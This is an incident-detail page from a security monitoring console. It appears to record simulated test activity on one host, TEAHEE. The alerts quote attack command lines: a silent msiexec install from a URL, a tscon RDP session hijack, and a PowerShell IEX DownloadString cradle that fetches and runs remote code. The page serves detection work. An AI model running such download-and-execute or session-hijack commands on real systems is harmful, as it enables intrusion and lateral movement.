Back to list

Incident Overview

Incident ID CINC-20251220-CA840701
Severity Medium (70)
Status new
Alert Count 4
Host Count 1

Timeline

First Seen 2025-12-18 10:18:40
Last Seen 2025-12-18 10:19:59
Duration 0d 0h 1m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Persistence Lateral Movement Execution
Techniques:
Event Triggered Execution Remote Desktop Protocol PowerShell User Execution

Affected Hosts (1)

TEAHEE

Related Alerts (4)

Severity Status Hostname Description Tactic Command Line Time
High new TEAHEE Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 10:19
High new TEAHEE A command line indicates an attempt to hijack a remote desktop protocol session. Review the process tree. Lateral Movement C:\WINDOWS\system32\cmd.exe /c "tscon 1 /dest:rdp-tcp#0" 12-18 10:19
High new TEAHEE A PowerShell process downloaded and launched a remote file. This is often the result of a malicious macro designed to drop a variety of second stage payloads. Review the command line. Execution C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" 12-18 10:19
Informational new TEAHEE A process has written a known EICAR test file. Review the files written by the triggered process. Execution "python" mega_incident_generator.py --rounds 2 --interval 30 12-18 10:18